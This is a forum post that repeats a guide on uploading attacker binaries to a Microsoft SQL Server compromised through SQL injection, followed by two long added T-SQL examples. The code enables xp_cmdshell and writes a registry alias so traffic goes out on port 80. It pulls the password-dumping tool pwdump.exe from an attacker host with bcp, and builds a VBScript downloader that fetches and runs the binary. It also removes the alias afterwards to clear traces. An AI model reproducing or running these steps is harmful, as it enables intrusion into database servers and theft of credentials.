I found this awesome guide on SQL Injection, and it had this really cool, but tiny, section on how to upload files via SQLi. It's worth the read in my honest opinion (but I am not that good at SQLi).
NOTE: I did not make this, I just found it on Google. You can find it by googling:
Code: Manipulating Microsoft SQL Server Using SQL Injection
Anyway, here it is:
---------------------
Uploading files (via sqli)
----------------------------------------------------------------------------------------------
=- =-
Please take note that this only works against Microsoft SQL Server running on Windows (bulk insert, bcp and xp_cmdshell are SQL Server features, not MySQL).
=- =-
Once an attacker has gained adequate privileges on the SQL Server (xp_cmdshell and xp_regwrite normally require sysadmin), they will then want to upload binaries to the server. Since this cannot be done using protocols such as SMB, because ports 137-139 (and 445) are typically blocked at the firewall, the attacker will need another method of getting the binaries onto the victim's file system.
This can be done by uploading a binary file into a table local to the attacker and then pulling the data to the victim's file system using a SQL Server connection.
To accomplish this the attacker would create a table on the local server as follows:
Code: create table AttackerTable (data text)
Having created the table to hold the binary, the attacker would then upload the binary into the table as follows:
Code: bulk insert AttackerTable
from 'pwdump.exe'
with (codepage = 'RAW')
The binary can then be downloaded to the victim server from the attacker's server by running the following SQL statement on the victim server:
Code: exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump.exe -c -Craw -Shackersip -Usa -Ph8ck3r'
This statement will issue an outbound connection from the victim to the attacker's server (-S hackersip, logging in as sa with the password h8ck3r, raw code page) and write the results of the query into a file, recreating the executable. In this case the connection will be made using the default protocol and port (TCP 1433), which could well be blocked by the firewall. To circumvent the firewall, the attacker could try:
Code: exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo', 'HackerSrvAlias', 'REG_SZ', 'DBMSSOCN,hackersip,80'
And then:
Code: exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump.exe -c -Craw -SHackerSrvAlias -Usa -Ph8ck3r'
The first SQL statement creates a client connection alias named HackerSrvAlias that points at the attacker's server over TCP/IP (the DBMSSOCN net-library) on port 80; the second statement connects through that alias, so the traffic leaves the victim on port 80, and downloads the binary file.
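The whole round trip described above, attacker side first and then the victim side, as an added T-SQL example that is not part of the original guide. The host name hackersip, the alias HackerSrvAlias, the sa/h8ck3r login and the file name pwdump.exe are the guide's own placeholders; the explicit paths, the sp_configure step, the size check and the registry cleanup are assumptions added here.

```sql
-- Added example (not from the original guide). Placeholders: hackersip, HackerSrvAlias,
-- sa / h8ck3r, pwdump.exe. Paths C:\tools and C:\temp are assumed.

-- ===== Attacker's SQL Server (must be reachable from the victim) =====
CREATE TABLE AttackerTable (data text);

-- Load the binary as raw bytes. BULK INSERT uses tab and CR-LF as its default field and
-- row terminators, so a file that contains those byte values may be split across rows.
BULK INSERT AttackerTable FROM 'C:\tools\pwdump.exe' WITH (CODEPAGE = 'RAW');

-- Record what actually landed in the table; compare with the file size on the victim later.
SELECT COUNT(*) AS rows_loaded, SUM(DATALENGTH(data)) AS bytes_loaded FROM AttackerTable;

-- ===== Victim's SQL Server (statements sent through the injection point, sysadmin needed) =====
-- From SQL Server 2005 on, xp_cmdshell is disabled by default; a sysadmin can switch it on.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Client alias: HackerSrvAlias -> TCP/IP net-library (DBMSSOCN), host hackersip, port 80.
EXEC xp_regwrite 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo',
    'HackerSrvAlias', 'REG_SZ', 'DBMSSOCN,hackersip,80';

-- bcp runs on the victim, connects outbound to the alias (port 80) and writes the rows to disk.
-- -c = character mode, -Craw = raw code page, -S alias, -U/-P attacker-side login.
EXEC xp_cmdshell 'bcp "select * from AttackerTable" queryout C:\temp\pwdump.exe -c -Craw -SHackerSrvAlias -Usa -Ph8ck3r';

-- Check: the size shown by dir should equal bytes_loaded plus the CR-LF row terminators
-- that bcp -c appends (one per row). Anything else means the binary was mangled in transit.
EXEC xp_cmdshell 'dir C:\temp\pwdump.exe';

-- Remove the alias afterwards so it does not linger in the victim's registry.
EXEC xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo', 'HackerSrvAlias';
```

The size comparison is the part worth keeping: the text-column plus bcp -c transfer relies on the default terminators never appearing inside the binary, and the only cheap way to know the copy is intact is to compare bytes_loaded with what dir reports before trying to run the file.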
Another method an attacker could use would be to write Visual Basic Script (.vbs) or JScript (.js) files to the OS file system and then execute those scripts. Using this technique the scripts would connect to any server and download the attacker's binary files, or the attacker could even copy over the script and execute it on the victim server.
Code: exec xp_cmdshell 'echo first script line > script.vbs'
exec xp_cmdshell 'echo second script line >> script.vbs'
...
exec xp_cmdshell 'echo last script line >> script.vbs'
exec xp_cmdshell 'cscript script.vbs' --> execute the script to download the binary (note: > creates the file, >> appends to it)
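A concrete version of the script-dropping method above, as an added example that is not from the original guide: a small VBScript HTTP downloader written line by line through xp_cmdshell and then run with cscript. The host hackersip and the file name pwdump.exe are the guide's placeholders; the URL, the path C:\temp and the script name dl.vbs are assumptions.

```sql
-- Added example (not from the original guide). Assumed: http://hackersip/pwdump.exe is served
-- by the attacker, C:\temp is writable, cscript.exe is on the PATH (it is on any Windows host).
-- The first echo uses > (create/overwrite); every later one uses >> (append), otherwise each
-- line would overwrite the previous one and only the last line would survive.
EXEC xp_cmdshell 'echo Set h = CreateObject("MSXML2.XMLHTTP") > C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo h.Open "GET", "http://hackersip/pwdump.exe", False >> C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo h.Send >> C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo Set s = CreateObject("ADODB.Stream") >> C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo s.Type = 1 >> C:\temp\dl.vbs';                       -- 1 = adTypeBinary
EXEC xp_cmdshell 'echo s.Open >> C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo s.Write h.responseBody >> C:\temp\dl.vbs';
EXEC xp_cmdshell 'echo s.SaveToFile "C:\temp\pwdump.exe", 2 >> C:\temp\dl.vbs'; -- 2 = adSaveCreateOverWrite
EXEC xp_cmdshell 'echo s.Close >> C:\temp\dl.vbs';

-- Run it with the console script host. The request goes out as plain HTTP on port 80,
-- which is the port most firewalls leave open for outbound traffic.
EXEC xp_cmdshell 'cscript //nologo C:\temp\dl.vbs';

-- Confirm the download landed (and compare the size with the original on the attacker side).
EXEC xp_cmdshell 'dir C:\temp\pwdump.exe';
```

Compared with the bcp route, this needs no second SQL Server and no client alias, and ADODB.Stream in binary mode writes the response bytes unchanged, so there is no terminator problem; the trade-off is that it drops a script to disk and spawns cscript, both of which are easy for an endpoint monitor to catch.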